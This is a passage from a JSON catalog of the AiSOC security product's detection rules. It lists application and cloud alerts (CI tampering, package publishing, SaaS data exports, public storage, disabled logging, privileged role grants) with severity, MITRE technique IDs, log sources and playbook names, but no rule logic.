"detections/application/app-cors-wildcard-with-creds.yaml" }, { "id": "det-application-045", "type": "detection", "name": "Content-Security-Policy Header Removed From Production Response", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Content-Security-Policy Header Removed From Production Response'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "application", "mitre_techniques": [ "T1190" ], "log_source": "application", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-csp-disabled.yaml" }, { "id": "det-application-046", "type": "detection", "name": "CI Workflow Modified By Account Without CODEOWNER Approval", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'CI Workflow Modified By Account Without CODEOWNER Approval'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1199" ], "log_source": "github", "playbook": "tpl-supply-chain", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-ci-workflow-modified-by-non-owner.yaml" }, { "id": "det-application-047", "type": "detection", "name": "Self-Hosted Runner Registered From External IP", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Self-Hosted Runner Registered From External IP'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "application", "mitre_techniques": [ "T1199" ], "log_source": "github", "playbook": "tpl-supply-chain", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-self-hosted-runner-external.yaml" }, { "id": "det-application-048", "type": "detection", "name": "Build Artifact Signing Key Rotated Outside Maintenance Window", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Build Artifact Signing Key Rotated Outside Maintenance Window'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1554" ], "log_source": "ci", "playbook": "tpl-supply-chain", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-build-signing-key-rotated.yaml" }, { "id": "det-application-049", "type": "detection", "name": "Helm Install From Unknown Chart Repository", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Helm Install From Unknown Chart Repository'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1195.002" ], "log_source": "kubernetes", "playbook": "tpl-supply-chain", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-helm-chart-untrusted-repo.yaml" }, { "id": "det-application-050", "type": "detection", "name": "terraform destroy Run Targeting Production Workspace", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'terraform destroy Run Targeting Production Workspace'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "application", "mitre_techniques": [ "T1485" ], "log_source": "terraform", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-terraform-destroy-prod.yaml" }, { "id": "det-application-051", "type": "detection", "name": "Newly Created Secret Has Slack Webhook Pattern", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Newly Created Secret Has Slack Webhook Pattern'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1078" ], "log_source": "vault", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-secret-published-to-slack.yaml" }, { "id": "det-application-052", "type": "detection", "name": "SSH Deploy Key Added To GitHub Repository", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'SSH Deploy Key Added To GitHub Repository'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "application", "mitre_techniques": [ "T1098.004" ], "log_source": "github", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-deploy-key-added-github.yaml" }, { "id": "det-application-053", "type": "detection", "name": "NPM Package Published From New Account", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'NPM Package Published From New Account'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1195.002" ], "log_source": "npm", "playbook": "tpl-supply-chain", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-npm-package-publish-new-account.yaml" }, { "id": "det-application-054", "type": "detection", "name": "PyPI Package Published From New IP", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'PyPI Package Published From New IP'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "application", "mitre_techniques": [ "T1195.002" ], "log_source": "pypi", "playbook": "tpl-supply-chain", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-pypi-package-publish-new-ip.yaml" }, { "id": "det-application-055", "type": "detection", "name": "Docker Daemon Started With --insecure-registry Flag", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Docker Daemon Started With --insecure-registry Flag'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "application", "mitre_techniques": [ "T1195.002" ], "log_source": "docker", "playbook": "tpl-supply-chain", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-docker-insecure-registry-flag.yaml" }, { "id": "det-application-056", "type": "detection", "name": "Container Image With Critical CVE Pushed To Prod Registry", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Container Image With Critical CVE Pushed To Prod Registry'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1525" ], "log_source": "container-registry", "playbook": "tpl-supply-chain", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-image-critical-cve-pushed.yaml" }, { "id": "det-application-057", "type": "detection", "name": "Branch Protection Disabled On Protected Branch", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Branch Protection Disabled On Protected Branch'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1098.004" ], "log_source": "github", "playbook": "tpl-supply-chain", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-protected-branch-disabled.yaml" }, { "id": "det-application-058", "type": "detection", "name": "Salesforce Mass Data Export Initiated", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Salesforce Mass Data Export Initiated'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1530" ], "log_source": "salesforce", "playbook": "tpl-exfiltration", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-salesforce-mass-export.yaml" }, { "id": "det-application-059", "type": "detection", "name": "Salesforce Sandbox Refreshed Outside Change Window", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Salesforce Sandbox Refreshed Outside Change Window'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "application", "mitre_techniques": [ "T1199" ], "log_source": "salesforce", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-salesforce-sandbox-refresh-anomaly.yaml" }, { "id": "det-application-060", "type": "detection", "name": "Workday Banking Info Changed Without HR Ticket", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Workday Banking Info Changed Without HR Ticket'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1098" ], "log_source": "workday", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-workday-bank-info-changed.yaml" }, { "id": "det-application-061", "type": "detection", "name": "Zoom Cloud Recording Shared Externally", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Zoom Cloud Recording Shared Externally'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "application", "mitre_techniques": [ "T1530" ], "log_source": "zoom", "playbook": "tpl-exfiltration", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-zoom-recording-shared-external.yaml" }, { "id": "det-application-062", "type": "detection", "name": "Box Created Many Public Links In Short Window", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Box Created Many Public Links In Short Window'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1567.002" ], "log_source": "box", "playbook": "tpl-exfiltration", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-box-public-link-mass-create.yaml" }, { "id": "det-application-063", "type": "detection", "name": "Notion Workspace Exported By Non-Admin", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Notion Workspace Exported By Non-Admin'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1530" ], "log_source": "notion", "playbook": "tpl-exfiltration", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-notion-workspace-export.yaml" }, { "id": "det-application-064", "type": "detection", "name": "Confluence Bulk Space Export", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Confluence Bulk Space Export'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "application", "mitre_techniques": [ "T1530" ], "log_source": "confluence", "playbook": "tpl-exfiltration", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-confluence-space-export-bulk.yaml" }, { "id": "det-application-065", "type": "detection", "name": "ServiceNow Bulk Record Export", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'ServiceNow Bulk Record Export'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "application", "mitre_techniques": [ "T1530" ], "log_source": "servicenow", "playbook": "tpl-exfiltration", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-servicenow-record-export-bulk.yaml" }, { "id": "det-application-066", "type": "detection", "name": "Slack File Shared To External Channel", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Slack File Shared To External Channel'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "application", "mitre_techniques": [ "T1567.002" ], "log_source": "slack", "playbook": "tpl-exfiltration", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-slack-file-shared-external.yaml" }, { "id": "det-application-067", "type": "detection", "name": "Slack Private Channel Converted To Public", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Slack Private Channel Converted To Public'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "application", "mitre_techniques": [ "T1213" ], "log_source": "slack", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-slack-channel-public-conversion.yaml" }, { "id": "det-application-068", "type": "detection", "name": "OneDrive Anonymous Sharing Link Created For Sensitive File", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'OneDrive Anonymous Sharing Link Created For Sensitive File'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1567.002" ], "log_source": "m365", "playbook": "tpl-exfiltration", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-onedrive-anonymous-link-sensitive.yaml" }, { "id": "det-application-069", "type": "detection", "name": "SharePoint Tenant-Wide Guest Access Enabled", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'SharePoint Tenant-Wide Guest Access Enabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1078.004" ], "log_source": "m365", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-sharepoint-guest-tenantwide.yaml" }, { "id": "det-application-070", "type": "detection", "name": "GraphQL Mutation Executed By Anonymous Caller", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'GraphQL Mutation Executed By Anonymous Caller'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1190" ], "log_source": "api-gateway", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-graphql-mutation-anonymous.yaml" }, { "id": "det-cloud-001", "type": "detection", "name": "AWS Root Account Console Login", "description": "Detects any console sign-in event using the AWS root account. Root account usage outside of initial setup or emergency break-glass scenarios should trigger immediate investigation. Best practice requires MFA on the root account.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1078.004" ], "log_source": "aws", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-root-account-login.yaml" }, { "id": "det-cloud-002", "type": "detection", "name": "AWS IAM Enumeration Burst", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS IAM Enumeration Burst'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1087.004", "T1069.003" ], "log_source": "aws", "playbook": "tpl-cloud-recon", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-iam-enumeration.yaml" }, { "id": "det-cloud-003", "type": "detection", "name": "AWS S3 Bucket Made Public", "description": "Detects when an S3 bucket ACL or bucket policy is modified to allow public read or public read-write access, which can lead to data exposure or unauthorised data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1530" ], "log_source": "aws", "playbook": "tpl-data-exposure", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-s3-public-bucket.yaml" }, { "id": "det-cloud-004", "type": "detection", "name": "AWS S3 Bucket Deletion", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS S3 Bucket Deletion'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1485" ], "log_source": "aws", "playbook": "tpl-data-destruction", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-s3-bucket-deletion.yaml" }, { "id": "det-cloud-005", "type": "detection", "name": "AWS EC2 Instance Launched in Unauthorized Region", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS EC2 Instance Launched in Unauthorized Region'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1578.002" ], "log_source": "aws", "playbook": "tpl-cloud-anomaly", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-ec2-launch-foreign-region.yaml" }, { "id": "det-cloud-006", "type": "detection", "name": "AWS Security Group Opened to 0.0.0.0/0", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS Security Group Opened to 0.0.0.0/0'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1190", "T1133" ], "log_source": "aws", "playbook": "tpl-cloud-misconfig", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-security-group-open-world.yaml" }, { "id": "det-cloud-007", "type": "detection", "name": "AWS IAM Policy with Wildcard Action", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS IAM Policy with Wildcard Action'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1078.004", "T1098.001" ], "log_source": "aws", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-iam-policy-permissive.yaml" }, { "id": "det-cloud-008", "type": "detection", "name": "AWS KMS Key Disabled or Scheduled for Deletion", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS KMS Key Disabled or Scheduled for Deletion'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1485", "T1486" ], "log_source": "aws", "playbook": "tpl-data-destruction", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-kms-key-disable.yaml" }, { "id": "det-cloud-009", "type": "detection", "name": "AWS CloudTrail Logging Disabled", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS CloudTrail Logging Disabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1562.008" ], "log_source": "aws", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-cloudtrail-disabled.yaml" }, { "id": "det-cloud-010", "type": "detection", "name": "AWS Lambda Function with Public Invoke Permission", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS Lambda Function with Public Invoke Permission'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1190" ], "log_source": "aws", "playbook": "tpl-cloud-misconfig", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-lambda-permissive-trigger.yaml" }, { "id": "det-cloud-011", "type": "detection", "name": "AWS VPC Flow Logs Disabled", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS VPC Flow Logs Disabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1562.008" ], "log_source": "aws", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-vpc-flow-logs-disabled.yaml" }, { "id": "det-cloud-012", "type": "detection", "name": "AWS RDS Instance Set Publicly Accessible", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS RDS Instance Set Publicly Accessible'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1190", "T1530" ], "log_source": "aws", "playbook": "tpl-data-exposure", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-rds-publicly-accessible.yaml" }, { "id": "det-cloud-013", "type": "detection", "name": "AWS EBS Snapshot Made Public", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS EBS Snapshot Made Public'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1530" ], "log_source": "aws", "playbook": "tpl-data-exposure", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-ebs-snapshot-public.yaml" }, { "id": "det-cloud-014", "type": "detection", "name": "AWS AssumeRole from Untrusted External Account", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS AssumeRole from Untrusted External Account'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1078.004", "T1199" ], "log_source": "aws", "playbook": "tpl-cloud-anomaly", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-cross-account-assumerole.yaml" }, { "id": "det-cloud-015", "type": "detection", "name": "AWS S3 GetObject Volume Anomaly per Principal", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS S3 GetObject Volume Anomaly per Principal'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1530" ], "log_source": "aws", "playbook": "tpl-data-exfil", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-s3-mass-getobject.yaml" }, { "id": "det-cloud-016", "type": "detection", "name": "Azure AD Owner/Global-Admin Role Assignment", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure AD Owner/Global-Admin Role Assignment'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1098.003" ], "log_source": "azure", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-ad-role-owner-assignment.yaml" }, { "id": "det-cloud-017", "type": "detection", "name": "Azure AD Application Credential Added", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure AD Application Credential Added'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1098.001" ], "log_source": "azure", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-ad-app-secret-added.yaml" }, { "id": "det-cloud-018", "type": "detection", "name": "Azure AD Conditional Access Policy Disabled or Removed", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure AD Conditional Access Policy Disabled or Removed'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1562.001" ], "log_source": "azure", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-conditional-access-disabled.yaml" }, { "id": "det-cloud-019", "type": "detection", "name": "Azure Key Vault Key Deleted", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure Key Vault Key Deleted'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1485" ], "log_source": "azure", "playbook": "tpl-data-destruction", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-keyvault-key-deleted.yaml" }, { "id": "det-cloud-020", "type": "detection", "name": "Azure NSG Rule Allowing 0.0.0.0/0 Inbound", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure NSG Rule Allowing 0.0.0.0/0 Inbound'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1190" ], "log_source": "azure", "playbook": "tpl-cloud-misconfig", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-nsg-allow-all-inbound.yaml" }, { "id": "det-cloud-021", "type": "detection", "name": "Azure Storage Account Container Made Public", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure Storage Account Container Made Public'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1530" ], "log_source": "azure", "playbook": "tpl-data-exposure", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-storage-public-blob.yaml" }, { "id": "det-cloud-022", "type": "detection", "name": "Azure AD MFA Disabled for User", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure AD MFA Disabled for User'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1556.006" ], "log_source": "azure", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-ad-mfa-disabled-for-user.yaml" }, { "id": "det-cloud-023", "type": "detection", "name": "Azure AD App Registration Granted Broad Graph Scope", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure AD App Registration Granted Broad Graph Scope'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1098.001" ], "log_source": "azure", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-app-registration-permissive-scope.yaml" }, { "id": "det-cloud-024", "type": "detection", "name": "Azure AD Login from Tor / Anonymous IP", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure AD Login from Tor / Anonymous IP'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1078.004" ], "log_source": "azure", "playbook": "tpl-account-compromise", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-login-anonymous-ip.yaml" }, { "id": "det-cloud-025", "type": "detection", "name": "Azure Resource Mass Deletion", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure Resource Mass Deletion'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1485" ], "log_source": "azure", "playbook": "tpl-data-destruction", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-resource-mass-delete.yaml" }, { "id": "det-cloud-026", "type": "detection", "name": "GCP IAM Primitive Role (Owner/Editor) Granted", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCP IAM Primitive Role (Owner/Editor) Granted'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1078.004" ], "log_source": "gcp", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-iam-primitive-role-grant.yaml" }, { "id": "det-cloud-027", "type": "detection", "name": "GCP Service Account Key Created", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCP Service Account Key Created'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1098.001" ], "log_source": "gcp", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-service-account-key-created.yaml" }, { "id": "det-cloud-028", "type": "detection", "name": "GCP GCS Bucket Set to Public", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCP GCS Bucket Set to Public'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1530" ], "log_source": "gcp", "playbook": "tpl-data-exposure", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-gcs-bucket-public.yaml" }, { "id": "det-cloud-029", "type": "detection", "name": "GCP Firewall Rule Allowing 0.0.0.0/0 Inbound", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCP Firewall Rule Allowing 0.0.0.0/0 Inbound'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1190" ], "log_source": "gcp", "playbook": "tpl-cloud-misconfig", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-firewall-rule-allow-all.yaml" }, { "id": "det-cloud-030", "type": "detection", "name": "GCP Project Marked for Deletion", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCP Project Marked for Deletion'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1485" ], "log_source": "gcp", "playbook": "tpl-data-destruction", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-project-deletion.yaml" }, { "id": "det-cloud-031", "type": "detection", "name": "GCP Audit Log Sink Disabled or Deleted", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCP Audit Log Sink Disabled or Deleted'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" 